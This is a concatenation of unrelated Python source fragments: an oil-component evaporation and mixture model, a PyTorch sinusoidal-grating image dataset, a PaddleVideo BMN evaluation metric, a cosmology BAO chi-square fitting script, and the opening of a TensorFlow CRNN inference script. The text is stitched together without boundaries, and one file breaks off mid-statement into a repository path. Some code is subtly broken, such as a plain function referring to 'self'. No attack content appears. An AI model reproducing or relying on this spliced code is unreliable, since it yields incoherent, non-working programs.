must have the same size") #Temperature is given in °C prev = 0 remaining = 100 for i in range(len(temp)): if temp[i] > wu.MAX_EVAPORATIVE_TEMP-273.15: break ratio = fraction[i] - prev prev = fraction[i] compound = component(temp[i], tot_amount * ratio/100) compound.boiling_T = temp[i] + 273.15 self.list_component.append(compound) remaining -= ratio #add non volatils compounds if not = 100% if remaining > 0: compound = component("Heavy (1000)", tot_amount * remaining/100) compound.boiling_T = 1000 self.list_component.append(compound) self.add_oil_properties() def add_Fingas(self, c1, c2 = None): """ Add the fingas constant c1 and c2 to the mix """ self.fingas1 = c1 self.fingas2 = c2 def add_component(self, compound): """ Add a component to the mix Parameters ---------- compound : Component to add """ self.list_component.append(compound) def is_pure(self): """ Return True if the mix is only composed of 0 or one component, else return False. """ return len(self.list_component) <= 1 def get_comp(self, index): """ Return the component at the position 'index' in the mix """ return self.list_component[index] def get_prop(self, T): """ Return the properties of the mix. If the mix is empty, return an exception. If it contains only one component, it returns it. If it contains more, it returns a combinaison of the properties Parameters ---------- T: temperature [K] """ if len(self.list_component) <= 0: raise Exception("This mixture has no component!") elif len(self.list_component) == 1: return self.list_component[0] else: #combine the components tot_amount = 0 molar_sum = 0 mass_sum = 0 for comp in self.list_component: tot_amount += comp.amount molar_sum += comp.amount / comp.molar_volume if comp.density is not None: mass_sum += comp.amount*comp.density else: mass_sum = None partial_P = 0 self.ref_T_Clau = self.list_component[0].ref_T_Clau for comp in self.list_component: if comp.partial_P is not None: partial_P += comp.get_partial_P(T) * comp.amount / comp.molar_volume else: partial_P += 0 if partial_P is not None and tot_amount != 0: partial_P = partial_P / molar_sum else: partial_P = None #1: computing the density from the components density = 0 for comp in self.list_component: if comp.get_density(T) is not None and comp.amount > 0: density += comp.amount * comp.get_density(T) / tot_amount #2: if not from components, take the defaut if density == 0: if len(self.density) > 0: density = self.get_density(T) elif mass_sum is not None and tot_amount != 0: density = mass_sum/tot_amount else: density = None bulk = component('bulk', tot_amount) bulk.density = density if tot_amount != 0: bulk.molar_weight = (tot_amount*density)/ molar_sum bulk.molar_volume = tot_amount /molar_sum else: bulk.molar_weight = None bulk.molar_volume = None bulk.partial_P = partial_P return bulk def get_molar_fract(self, tg_comp): """ Get the molar fraction of the component tg_comp """ if len(self.list_component) <= 0: raise Exception("This oil has no component!") molar_sum = 0 for comp in self.list_component: molar_sum += comp.amount / comp.molar_volume fract = (tg_comp.amount / tg_comp.molar_volume) /molar_sum return fract def add_amount(self, add_amount): """ This function add/remove for each component at the same time and return an array with the quantities added to each component """ tot_amount = 0 array_tr = np.zeros((len(self.list_component))) for comp in self.list_component: tot_amount += comp.amount for i in range(0, len(self.list_component)): amount = add_amount * (self.list_component[i].amount/tot_amount) self.list_component[i].amount += amount array_tr[i] = amount return array_tr def get_density(self, T): """ Return the density[kg/m³] interpolated at the value T [K] """ return interp(T, self.density, self.density_T) def get_viscosity(self, T): """ Return the viscosity[Pa s] interpolated at the value T [K] """ return interp(T, self.viscosity, self.viscosity_T) def get_array_amount(self): """ Return an array with the amount of each component [m³] """ array_tr = np.zeros((len(self.list_component))) for i in range(0,len(self.list_component)): array_tr[i] = self.get_comp(i).amount return array_tr def add_oil_properties(self): """ Compute the boiling temperature, molar volume and molar weigth of components """ for component in self.list_component: if component.boiling_T is None and component.density is not None: component.boiling_T = ev.boiling_T_rho(component.density) elif component.boiling_T is not None and component.density is None: component.density = ev.rho_from_boiling_T(component.boiling_T) if component.molar_volume is None: component.molar_volume = ev.molar_volume_eb_T(component.boiling_T) if component.density is not None and component.molar_weight is None: component.molar_weight = component.density * component.molar_volume def get_mix_viscosity(mix, array_in_emulsion): """ Return the viscosity of the mix, array_in_emulsion is an array with the amount of each component in emulsion """ #if there is less than 1% of emulsion, we make the log sum of viscosity #TODO pass def get_emulsion_density(mix, T, array_in_emulsion, water_density = 1020): """ Return the density by taking into account each component, T is the temperature, array_in_emulsion is an array with the amount of each component in emulsion """ water_volume = 0 oil_volume = 0 oil_mass = 0 for i in range(0, len(mix.list_component)): component_density = mix.list_component[i].get_density(T) if component_density is None : return None oil_volume += (mix.list_component[i].amount+array_in_emulsion[i]) oil_mass += (mix.list_component[i].amount+array_in_emulsion[i]) * component_density water_volume += array_in_emulsion[i] *(mix.max_water/(1-self.max_water)) return (oil_mass+water_volume*1020)/(oil_volume+water_volume) class component: ref_T_Clau = None #[K] : ref temp for the vap_enthalpie and partial_P molar_weight = None #[kg/mol] density = None #[kg/m³] boiling_T = None #[K] partial_P = None #[Pa] molar_volume = None #[m³/mol] vap_enthalpie = None #[J/kg] h_l_phot = None #[1/s] h_l_biod = None #[1/s] solubility = None #[kg/m³] def __init__(self, name, amount = 0): self.name = name self.amount = amount #[m³] def get_density(self, T=0): """ Return the density [kg/m³] of the component. The temperature T [K]can be given for taking into account the density change with the temperature """ #TODO : change in density with the temperature return self.density def get_partial_P(self, T): """ Return the partial pressure [Pa] of the component at the temperature T [K] """ if self.vap_enthalpie is not None and self.ref_T_Clau is not None: a = (1/self.ref_T_Clau)-(1/T) return self.partial_P * math.exp((self.vap_enthalpie * self.molar_weight/8.314) * a) else: return self.partial_P def compute_enthalpy(self): """ Return an estimation of the vap_enthalpie from a vapor pressure at a certain temperature an the ebulition temperature. It suppose the vap_enthalpie independant of the temperature """ if self.molar_weight is None: raise Exception("The molar_weight must be defined for this") if self.boiling_T is None: raise Exception("The boiling_T must be defined for this") if self.ref_T_Clau is None: raise Exception("The ref_T_Clau must be defined for this") num = - 8.314 *math.log(self.boiling_T/self.partial_P) den = self.molar_weight* (1/self.boiling_T-1/self.ref_T_Clau) self.vap_enthalpie = num/den def compute_molar_volume(self): """ Compute the molar volume from the molar weight and density """ self.molar_volume = self.molar_weight/self.density def to_half_life(days): """ Return the constant [1/s] from the half life length [day] """ s= days * 3600*24 return -math.log(1/2)/s import torch from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms import scipy.stats from scipy import ndimage import numpy as np import matplotlib.pyplot as plt from PIL import Image, ImageDraw, ImageFilter import io import random from pathlib import Path import os import shutil pil_to_tensor = transforms.Compose( [transforms.PILToTensor(), transforms.ConvertImageDtype(torch.float) ]) def show_img(image, **kwargs): plt.figure() plt.axis('off') plt.imshow(image, cmap="Greys", **kwargs) def y_sinusoid(size=(256,256), frequency=4, phase_shift=0): ''' Draw a sinusoidal grating that changes value across y axis ''' x = np.arange(size[0]) y = np.arange(size[1]) X,Y = np.meshgrid(x,y) Z = np.sin(2*np.pi * frequency * (Y/size[0]) + phase_shift) return Z def mask_circle_solid(pil_img, background_color, blur_radius, offset=0): ''' 'pil_img' becomes a circle inside a 'background_color' rectangle ''' background = Image.new(pil_img.mode, pil_img.size, background_color) offset = blur_radius * 2 + offset mask = Image.new("L", pil_img.size, 0) draw = ImageDraw.Draw(mask) draw.ellipse((offset, offset, pil_img.size[0] - offset, pil_img.size[1] - offset), fill=255) mask = mask.filter(ImageFilter.GaussianBlur(blur_radius)) return Image.composite(pil_img, background, mask) #return pil_img def circular_sinegrate(frequency, rotation, image_size=(256,256), phase_shift=0): ''' Generate a circular sinusoidal grating. frequency (float) : frequency of the sinusoid rotation (float) : counterclockwise rotation of the sinusoid in degrees phase_shift (float): move phase right/left. Radians size (int,int) : size of the output image ''' np_sinegrate = y_sinusoid(image_size, frequency, phase_shift) rotated_sinegrate = ndimage.rotate(np_sinegrate, rotation, reshape=False) pil_sinegrate = Image.fromarray(((rotated_sinegrate*127)+128).astype(np.uint8)) # convert [-1,1] to [0,255] return mask_circle_solid(pil_sinegrate, background_color=128, blur_radius=1, offset=18) def freq_transform(x): return x / 30 + 0.25 # cpd (cycles per degree) -> will be later converted to regular cycles per image def orient_transform(y): return np.deg2rad((9/10 * y) + 20) # radians -> will be later converted to degrees def rotate_points(points, angle=np.pi/4): ''' Rotate a set of points around the center of mass of the points angle in radians ''' center = np.mean(points,axis=0) rotation_matrix = np.array([[np.cos(angle), -np.sin(angle)], [np.sin(angle), np.cos(angle)]]) return np.dot(points - center, rotation_matrix) + center def generate_params(mean=[30,50], cov=[[10,0],[0,150]], size=100, categorization_scheme='rb'): distribution = scipy.stats.multivariate_normal.rvs(mean=mean, cov=cov, size=size) if categorization_scheme == 'ii': distribution = rotate_points(distribution, np.pi/4) return np.array([[freq_transform(x), orient_transform(y)] for x,y in distribution]) class SineGrates(Dataset): def __init__(self, cat_scheme='rb', dist_params = None, visual_angle='5', length=100, image_size=(256,256), transform=None, randomize_phase=True): ''' PyTorch Sinusoidal Grating image dataset generator cat_scheme (string): categorization scheme- 'rb'(rule-based) or 'ii'(information-integration) visual_angle (float): angle in degrees that the image occupies in the human visual field length (int): arbitrary length of the dataset. Data is generated on-the-fly using the distribution defined by `cat_scheme`. image_size (int,int): pixel size of output image ''' self.cat_scheme=cat_scheme #self.dist_params = dist_params self.visual_angle = visual_angle self.length = length self.image_size = image_size self.transform = transform self.randomize_phase = randomize_phase #if dist_params is None: if self.cat_scheme == 'rb': assert len(np.array(dist_params['a_means']).shape) == 2, "Rule-based scheme's 'a_means' should be a 2-d list" assert len(np.array(dist_params['b_means']).shape) == 2, "Rule-based scheme's 'b_means' should be a 2-d list" assert len(np.array(dist_params['a_covariances']).shape) == 3, "Rule-based scheme's 'a_covariances' should be a 3-d list" assert len(np.array(dist_params['b_covariances']).shape) == 3, "Rule-based scheme's 'b_covariances' should be a 3-d list" elif self.cat_scheme == 'ii': assert len(np.array(dist_params['a_means']).shape) == 1, "Rule-based scheme's 'a_means' should be a 1-d list" assert len(np.array(dist_params['b_means']).shape) == 1, "Rule-based scheme's 'b_means' should be a 1-d list" assert len(np.array(dist_params['a_covariances']).shape) == 2, "Rule-based scheme's 'a_covariances' should be a 2-d list" assert len(np.array(dist_params['b_covariances']).shape) == 2, "Rule-based scheme's 'b_covariances' should be a 2-d list" self.parse_params(dist_params) def save_dataset(self, path, extension='png'): self.generate_dataset() path = Path(path) if os.path.exists(path/'A'): shutil.rmtree(path/'A') os.makedirs(path/'A') if os.path.exists(path/'B'): shutil.rmtree(path/'B') os.makedirs(path/'B') for i, (label, pil_image) in enumerate(self.a_dataset): pil_image.save(path/'A'/f'{i}.{extension}') for i, (label, pil_image) in enumerate(self.b_dataset): pil_image.save(path/'B'/f'{i}.{extension}') def generate_dataset(self): # label 0 refers to 'a' condition # label 1 refers to 'b' condition self.a_dataset = [(0, self.get_image(parameters[0], parameters[1], randomize_phase=self.randomize_phase)) for parameters in self.a_params] self.b_dataset = [(1, self.get_image(parameters[0], parameters[1], randomize_phase=self.randomize_phase)) for parameters in self.b_params] def parse_params(self, dist_params): if self.cat_scheme == 'rb': # in 'rb' condition, the parameters are composed of two distributions. # here we generate paramers for each of the two and fuse them into one self.a1_params = generate_params(mean=dist_params['a_means'][0], cov=dist_params['a_covariances'][0], size=self.length//2, categorization_scheme=self.cat_scheme) self.a2_params = generate_params(mean=dist_params['a_means'][1], cov=dist_params['a_covariances'][1], size=self.length//2, categorization_scheme=self.cat_scheme) self.a_params = np.vstack((self.a1_params, self.a2_params)) self.b1_params = generate_params(mean=dist_params['b_means'][0], cov=dist_params['b_covariances'][0], size=self.length//2, categorization_scheme=self.cat_scheme) self.b2_params = generate_params(mean=dist_params['b_means'][1], cov=dist_params['b_covariances'][1], size=self.length//2, categorization_scheme=self.cat_scheme) self.b_params = np.vstack((self.b1_params, self.b2_params)) elif self.cat_scheme == 'ii': self.a_params = generate_params(mean=dist_params['a_means'], cov=dist_params['a_covariances'], size=self.length, categorization_scheme=self.cat_scheme) self.b_params = generate_params(mean=dist_params['b_means'], cov=dist_params['b_covariances'], size=self.length, categorization_scheme=self.cat_scheme) def get_image(self, frequency, orientation, randomize_phase=True): freq = float(frequency) * float(self.visual_angle) orientation = np.rad2deg(orientation) phase_shift = random.uniform(0, 2*np.pi) if randomize_phase else 0 img = circular_sinegrate(freq, orientation, image_size=self.image_size, phase_shift=phase_shift) return img def __len__(self): return self.length * 2 # since 'a' and 'b' are each self.length items. def __getitem__(self, idx): fetched_data = list((self.a_dataset + self.b_dataset)[idx]) if self.transform is not None: fetched_data[1] = self.transform(fetched_data[1]) return fetched_data def set_dist_params(self, new_dist_params): ''' Use this setter function to update self.dist_params after instantiating class. Used for interactive distribution parameter setting via ipywidgets ''' self.parse_params(new_dist_params) def plot_final(self): ''' Return figure representing the distribution of final dataset Usage: plt.show(dataset.plot_final()) where dataset: an instance of this dataset class ''' #plt.rcParams['figure.figsize'] = (5,5) if self.cat_scheme == 'rb': plt_figure = plt.figure(figsize=(5,5)) #axarr = plt_figure.add_subplot(1,1,1) plt.scatter(self.a1_params[:,0], self.a1_params[:,1], s=60, marker='+', color='black') plt.scatter(self.a2_params[:,0], self.a2_params[:,1], s=60, marker='+', color='black') plt.scatter(self.b1_params[:,0], self.b1_params[:,1], facecolors='none', edgecolors='gray') plt.scatter(self.b2_params[:,0], self.b2_params[:,1], facecolors='none', edgecolors='gray') plt.axis([0.0, 4.0, 0.0, 1.6]) plt.yticks(np.arange(0, 2.1, 0.5)) plt.xticks(np.arange(0,4.1,1)) elif self.cat_scheme == 'ii': plt_figure = plt.figure(figsize=(5,5)) plt.scatter(self.a_params[:,0], self.a_params[:,1], s=60, marker='+', color='black') plt.scatter(self.b_params[:,0], self.b_params[:,1], facecolors='none', edgecolors='gray') plt.axis([0.0, 4.0, 0.0, 1.6]) plt.yticks(np.arange(0, 2.1, 0.5)) plt.xticks(np.arange(0,4.1,1)) else: print(f"Category type 'self.cat_scheme': {self.cat_scheme} is not supported.") fig = plt.figure() fig.canvas.draw() #data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8) #data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) return fig if __name__=="__main__": dataset = SineGrates(cat_scheme='rb', length=200) print(next(iter(dataset)))# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License" # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. import os, pickle, tqdm import json import numpy as np import pandas as pd import multiprocessing as mp from .registry import METRIC from .base import BaseMetric from .ActivityNet import ANETproposal from paddlevideo.utils import get_logger logger = get_logger("paddlevideo") def iou_with_anchors(anchors_min, anchors_max, box_min, box_max): """Compute jaccard score between a box and the anchors. """ len_anchors = anchors_max - anchors_min int_xmin = np.maximum(anchors_min, box_min) int_xmax = np.minimum(anchors_max, box_max) inter_len = np.maximum(int_xmax - int_xmin, 0.) union_len = len_anchors - inter_len + box_max - box_min jaccard = np.divide(inter_len, union_len) return jaccard def boundary_choose(score_list): """Choose start and end boundary from score. """ max_score = max(score_list) mask_high = (score_list > max_score * 0.5) score_list = list(score_list) score_middle = np.array([0.0] + score_list + [0.0]) score_front = np.array([0.0, 0.0] + score_list) score_back = np.array(score_list + [0.0, 0.0]) mask_peak = ((score_middle > score_front) & (score_middle > score_back)) mask_peak = mask_peak[1:-1] mask = (mask_high | mask_peak).astype('float32') return mask def soft_nms(df, alpha, t1, t2): ''' df: proposals generated by network; alpha: alpha value of Gaussian decaying function; t1, t2: threshold for soft nms. ''' df = df.sort_values(by="score", ascending=False) tstart = list(df.xmin.values[:]) tend = list(df.xmax.values[:]) tscore = list(df.score.values[:]) rstart = [] rend = [] rscore = [] while len(tscore) > 1 and len(rscore) < 101: max_index = tscore.index(max(tscore)) tmp_iou_list = iou_with_anchors(np.array(tstart), np.array(tend), tstart[max_index], tend[max_index]) for idx in range(0, len(tscore)): if idx != max_index: tmp_iou = tmp_iou_list[idx] tmp_width = tend[max_index] - tstart[max_index] if tmp_iou > t1 + (t2 - t1) * tmp_width: tscore[idx] = tscore[idx] * np.exp( -np.square(tmp_iou) / alpha) rstart.append(tstart[max_index]) rend.append(tend[max_index]) rscore.append(tscore[max_index]) tstart.pop(max_index) tend.pop(max_index) tscore.pop(max_index) newDf = pd.DataFrame() newDf['score'] = rscore newDf['xmin'] = rstart newDf['xmax'] = rend return newDf def soft_nms_for_merging(proposal_dict, alpha=0.4, t1=0.55, t2=0.9, dscale=4): ''' proposal_dict: proposals generated by network; alpha: alpha value of Gaussian decaying function; t1, t2: threshold for soft nms. ''' #df = df.sort_values(by="score", ascending=False) sorted_proposal = sorted(proposal_dict, key=lambda x:x["score"], reverse=True) tstart = [] tend = [] tscore = [] for pp in sorted_proposal: tstart.append(pp["segment"][0]) tend.append(pp["segment"][1]) tscore.append(pp["score"]) rstart = [] rend = [] rscore = [] while len(tscore) > 1 and len(rscore) < 101: max_index = tscore.index(max(tscore)) tmp_iou_list = iou_with_anchors(np.array(tstart), np.array(tend), tstart[max_index], tend[max_index]) for idx in range(0, len(tscore)): if idx != max_index: tmp_iou = tmp_iou_list[idx] tmp_width = (tend[max_index] - tstart[max_index])/dscale if tmp_iou > t1 + (t2 - t1) * tmp_width: tscore[idx] = tscore[idx] * np.exp( -np.square(tmp_iou) / alpha) rstart.append(tstart[max_index]) rend.append(tend[max_index]) rscore.append(tscore[max_index]) tstart.pop(max_index) tend.pop(max_index) tscore.pop(max_index) new_proposal = [] for i in range(len(rscore)): pp = {} pp['score'] = round(rscore[i], 2) pp["segment"] = [round(rstart[i], 2), round(rend[i], 2)] new_proposal.append(pp) return new_proposal @METRIC.register class BMNMetric(BaseMetric): """ Metrics for BMN. Two Stages in this metric: (1) Get test results using trained model, results will be saved in BMNMetric.result_path; (2) Calculate metrics using results file from stage (1). """ def __init__(self, data_size, batch_size, tscale, dscale, file_path, ground_truth_filename, subset, output_path, result_path, get_metrics=True, log_interval=100, to_merge=False): """ Init for BMN metrics. Params: get_metrics: whether to calculate AR@N and AUC metrics or not, default True. """ super().__init__(data_size, batch_size, log_interval) assert self.batch_size == 1, " Now we just support batch_size==1 test" assert self.world_size == 1, " Now we just support single-card test" self.tscale = tscale self.dscale = dscale self.file_path = file_path self.ground_truth_filename = ground_truth_filename self.subset = subset self.output_path = output_path self.result_path = result_path self.get_metrics = get_metrics self.to_merge = to_merge if not os.path.isdir(self.output_path): os.makedirs(self.output_path) if not os.path.isdir(self.result_path): os.makedirs(self.result_path) self.video_dict, self.video_list = self.get_dataset_dict( self.file_path, self.subset) def get_dataset_dict(self, file_path, subset): annos = json.load(open(file_path)) video_dict = {} for video_name in annos.keys(): video_subset = annos[video_name]["subset"] if subset in video_subset: video_dict[video_name] = annos[video_name] video_list = list(video_dict.keys()) video_list.sort() return video_dict, video_list def update(self, batch_id, data, outputs): """update metrics during each iter """ fid = data[4].numpy() pred_bm, pred_start, pred_end = outputs pred_bm = pred_bm.numpy() pred_start = pred_start[0].numpy() pred_end = pred_end[0].numpy() snippet_xmins = [1.0 / self.tscale * i for i in range(self.tscale)] snippet_xmaxs = [ 1.0 / self.tscale * i for i in range(1, self.tscale + 1) ] cols = ["xmin", "xmax", "score"] video_name = self.video_list[fid[0]] pred_bm = pred_bm[0, 0, :, :] * pred_bm[0, 1, :, :] start_mask = boundary_choose(pred_start) start_mask[0] = 1. end_mask = boundary_choose(pred_end) end_mask[-1] = 1. score_vector_list = [] for idx in range(self.dscale): for jdx in range(self.tscale): start_index = jdx end_index = start_index + idx if end_index < self.tscale and start_mask[ start_index] == 1 and end_mask[end_index] == 1: xmin = snippet_xmins[start_index] xmax = snippet_xmaxs[end_index] xmin_score = pred_start[start_index] xmax_score = pred_end[end_index] bm_score = pred_bm[idx, jdx] conf_score = xmin_score * xmax_score * bm_score score_vector_list.append([xmin, xmax, conf_score]) score_vector_list = np.stack(score_vector_list) video_df = pd.DataFrame(score_vector_list, columns=cols) video_df.to_csv(os.path.join(self.output_path, "%s.csv" % video_name), index=False) if batch_id % self.log_interval == 0: logger.info("Processing................ batch {}".format(batch_id)) def accumulate(self): """accumulate metrics when finished all iters. """ # check clip index of each video #Stage1 self.bmn_post_processing(self.video_dict, self.subset, self.output_path, self.result_path) if self.get_metrics: result_path = os.path.join(self.result_path, "bmn_results_validation.json") if self.to_merge: merged_result_path = os.path.join(self.result_path, "bmn_merged_results_validation.json") self.merging_output_per_video(self.tscale, self.ground_truth_filename, result_path, merged_result_path) result_path = merged_result_path logger.info("[TEST] calculate metrics...") #Stage2 uniform_average_nr_proposals_valid, uniform_average_recall_valid, uniform_recall_valid = self.cal_metrics( self.ground_truth_filename, result_path, max_avg_nr_proposals=100, tiou_thresholds=np.linspace(0.5, 0.9, 9), # orig: (0.5, 0.95, 10) subset='validation') logger.info("AR@1; AR@5; AR@10; AR@100") self.ar_1 = 100 * np.mean(uniform_recall_valid[:, 0]) self.ar_5 = 100 * np.mean(uniform_recall_valid[:, 4]) self.ar_10 = 100 * np.mean(uniform_recall_valid[:, 9]) self.ar_100 = 100 * np.mean(uniform_recall_valid[:, -1]) logger.info("%.02f %.02f %.02f %.02f" % (self.ar_1, self.ar_5, self.ar_10, self.ar_100)) self.auc = int(np.trapz(uniform_average_recall_valid, uniform_average_nr_proposals_valid)*100)/100. def bmn_post_processing(self, video_dict, subset, output_path, result_path): video_list = list(video_dict.keys()) global result_dict result_dict = mp.Manager().dict() pp_num = 12 num_videos = len(video_list) num_videos_per_thread = int(num_videos / pp_num) processes = [] for tid in range(pp_num - 1): tmp_video_list = video_list[tid * num_videos_per_thread:(tid + 1) * num_videos_per_thread] p = mp.Process(target=self.video_process, args=(tmp_video_list, video_dict, output_path, result_dict)) p.start() processes.append(p) tmp_video_list = video_list[(pp_num - 1) * num_videos_per_thread:] p = mp.Process(target=self.video_process, args=(tmp_video_list, video_dict, output_path, result_dict)) p.start() processes.append(p) for p in processes: p.join() result_dict = dict(result_dict) output_dict = { "version": "VERSION 1.3", "results": result_dict, "external_data": {} } outfile = open( os.path.join(result_path, "bmn_results_%s.json" % subset), "w") json.dump(output_dict, outfile) outfile.close() def video_process(self, video_list, video_dict, output_path, result_dict, snms_alpha=0.4, snms_t1=0.55, snms_t2=0.9): for vidx, video_name in enumerate(video_list): if vidx % self.log_interval == 0: logger.info("Processing video........" + video_name) df = pd.read_csv(os.path.join(output_path, video_name + ".csv")) if len(df) > 1: df = soft_nms(df, snms_alpha, snms_t1, snms_t2) video_duration = video_dict[video_name]["duration_second"] proposal_list = [] for idx in range(min(100, len(df))): tmp_prop={"score":df.score.values[idx], \ "segment":[max(0,df.xmin.values[idx])*video_duration, \ min(1,df.xmax.values[idx])*video_duration]} proposal_list.append(tmp_prop) result_dict[video_name[2:]] = proposal_list def cal_metrics(self, ground_truth_filename, proposal_filename, max_avg_nr_proposals=100, tiou_thresholds=np.linspace(0.5, 0.95, 10), subset='validation'): anet_proposal = ANETproposal(ground_truth_filename, proposal_filename, tiou_thresholds=tiou_thresholds, max_avg_nr_proposals=max_avg_nr_proposals, subset=subset, verbose=True, check_status=False) anet_proposal.evaluate() recall = anet_proposal.recall average_recall = anet_proposal.avg_recall average_nr_proposals = anet_proposal.proposals_per_video return (average_nr_proposals, average_recall, recall) def merging_output_per_video(self, win_t, ground_truth_filename, proposal_filename, merging_output_filename, snms_alpha=0.4, snms_t1=0.55, snms_t2=0.9): # 合并回提交文件 with open(ground_truth_filename, 'r', encoding='utf-8') as f: label_dict = json.load(f) val_file_name = label_dict['database'].keys() fps = label_dict['fps'] with open(proposal_filename, 'r', encoding='utf-8') as f: pred_dict = json.load(f) new_pred_dict = {"version":pred_dict["version"], "external_data": {}} results_dict = pred_dict["results"] new_results_dict = {} for file_name in tqdm.tqdm(val_file_name): frames_len = label_dict['database'][file_name]['num_frames'] clip_count = 1 proposal = [] for start_f in range(0, frames_len, win_t//2): end_f = start_f+win_t if end_fmatiasleize/tesis_licenciatura """ Created on Sun Feb 2 13:28:48 2020 @author: matias """ import numpy as np from numpy.linalg import inv from matplotlib import pyplot as plt import time import camb from camb import model, initialpower from scipy.integrate import cumtrapz as cumtrapz from scipy.integrate import simps as simps from scipy.interpolate import interp1d from scipy.constants import c as c_luz #metros/segundos c_luz_km = c_luz/1000 import sys import os from os.path import join as osjoin from pc_path import definir_path path_git, path_datos_global = definir_path() os.chdir(path_git) sys.path.append('./Software/Funcionales/') from funciones_int import Hubble_teorico from funciones_BAO import r_drag, r_drag_camb from funciones_LambdaCDM import H_LCDM #%% def chi_2_BAO(teo, data, errores): chi2 = np.sum(((data-teo)/errores)**2) return chi2 def Hs_to_Ds_old_data(zs, Hs, z_data, index): INT = cumtrapz(Hs**(-1), zs, initial=0) DA = (c_luz_km/(1 +zs)) * INT if index == 0: #DA aux = DA if index == 1: #DH aux = c_luz_km/Hs if index == 2: #DM aux = (1+zs) * DA if index == 3: #DV aux = ((1 +zs)**2 * DA**2 * (c_luz_km * zs/Hs)) ** (1/3) if index == 4: #H aux = Hs output = interp1d(zs,aux) return output(z_data) def params_to_chi2_BAO_old_data(theta, params_fijos, dataset, cantidad_zs=int(10**6),num_datasets=5): '''Dados los parámetros libres del modelo (omega, b y H0) y los que quedan params_fijos (n), devuelve un chi2 para los datos de BAO''' [omega_m, H_0] = theta zs_modelo = np.linspace(0.01, 3, cantidad_zs) H_modelo = H_LCDM(zs_modelo, omega_m, H_0) rd = r_drag_camb(omega_m,H_0) #Calculo del rd chies = np.zeros(num_datasets) for i in range(num_datasets): (z_data, valores_data, errores_data, rd_fid) = dataset[i] if i==0: #Dato de Da valores_data_2 = valores_data * (rd/rd_fid) errores_data_2 = errores_data * (rd/rd_fid) pass elif i==4: #Datos de H valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): valores_data_2[j] = valores_data[j] * (rd/rd_fid[j]) errores_data_2[j] = errores_data[j] * (rd/rd_fid[j]) else: valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): if rd_fid[j] != 1: valores_data_2[j] = valores_data[j] * (rd_fid[j]/rd) errores_data_2[j] = errores_data[j] * (rd_fid[j]/rd) else: #No hay que multiplicar x ningun factor valores_data_2[j] = valores_data[j] errores_data_2[j] = errores_data[j] outs = Hs_to_Ds_old_data(zs_modelo,H_modelo,z_data,i) chies[i] = chi_2_BAO(outs,valores_data_2,errores_data_2) if np.isnan(sum(chies))==True: print('Hay errores!') print(omega_m,H_0,rd) return np.sum(chies) if __name__ == '__main__': from scipy.constants import c as c_luz #metros/segundos from matplotlib import pyplot as plt import sys import os from os.path import join as osjoin from pc_path import definir_path path_git, path_datos_global = definir_path() #%% BAO os.chdir(path_git+'/Software/Estadística/Datos/BAO/Datos_viejos') archivo_BAO = ['datos_BAO_da.txt','datos_BAO_dh.txt','datos_BAO_dm.txt', 'datos_BAO_dv.txt','datos_BAO_H.txt'] def leer_data_BAO(archivo_BAO): z, valores_data, errores_data, rd_fid = np.loadtxt(archivo_BAO, usecols=(0,1,2,4),unpack=True) return z, valores_data, errores_data, rd_fid dataset_BAO = [] for i in range(5): aux = leer_data_BAO(archivo_BAO[i]) dataset_BAO.append(aux) #%% num_datasets = 5 #[omega_m,H_0] = [0.33013649504023296, 66.48702802652504] [omega_m,H_0] = [0.298,73.5] zs_modelo = np.linspace(0.01, 3, 10**6) H_modelo = H_LCDM(zs_modelo, omega_m, H_0) rd = r_drag_camb(omega_m,H_0) #Calculo del rd legends = ['Da','Dh','Dm','Dv','H'] chies = np.zeros(num_datasets) for i in range(5): (z_data, valores_data, errores_data, rd_fid) = dataset_BAO[i] if i==0: #Dato de Da valores_data_2 = valores_data * (rd/rd_fid) errores_data_2 = errores_data * (rd/rd_fid) elif i==4: #Datos de H valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): valores_data_2[j] = valores_data[j] * (rd_fid[j]/rd) errores_data_2[j] = errores_data[j] * (rd_fid[j]/rd) else: valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): if rd_fid[j] != 1: valores_data_2[j] = valores_data[j] * (rd/rd_fid[j]) errores_data_2[j] = errores_data[j] * (rd/rd_fid[j]) else: #No hay que multiplicar x ningun factor valores_data_2[j] = valores_data[j] errores_data_2[j] = errores_data[j] outs = Hs_to_Ds_old_data(zs_modelo,H_modelo,z_data,i) chies[i] = chi_2_BAO(outs,valores_data_2,errores_data_2) print(np.sum(chies)/(17-2)) plt.close() plt.figure(2) plt.grid() plt.errorbar(z_data,valores_data_2,errores_data_2,fmt='.r') plt.plot(z_data,outs,'.-b')#los puntos unidos por lineas, no es la forma real plt.title(legends[i]) plt.xlabel('z (redshift)') plt.ylabel(legends[i]) os.chdir(path_git+'/Software/Estadística/Datos/BAO/Datos_viejos/Imagen') #os.chdir(path_git+'/Software/Estadística/Datos/BAO/Datos_sin_nuevos/Imagen') #plt.savefig('{}'.format(legends[i])) import argparse import os import tensorflow as tf import libs.utils as utils from libs.config import load_config from libs.infer import validation from nets.crnn import CRNN from libs.label_converter import LabelConverter from libs.img_dataset import ImgDataset from parse_args import parse_args from parse_args import parse_infer_args # http://cv-tricks.com/tensorflow-tutorial/save-restore-tensorflow-models-quick-complete-tutorial/ def restore_ckpt(sess, checkpoint_dir): print("Restoring checkpoint from: " + checkpoint_dir) print('checkpoint_dir',checkpoint_dir) ckpt = tf.train.latest_checkpoint(checkpoint_dir) if ckpt is None: print("Checkpoint not found") exit(-1) meta_file = ckpt + '.meta' try: print('Restore graph from {}'.format(meta_file)) print('Restore variables from {}'.format(ckpt)) saver = tf.train.import_meta_graph(meta_file) saver.restore(sess, ckpt) except Exception: raise Exception("Can not restore from {}".format(checkpoint_dir)) step = ckpt.split('/')[-1].split('_')[1] return int(step) def infer(args): converter = LabelConverter(chars_file=args.chars_file) config = tf.ConfigProto(allow_soft_placement=True) 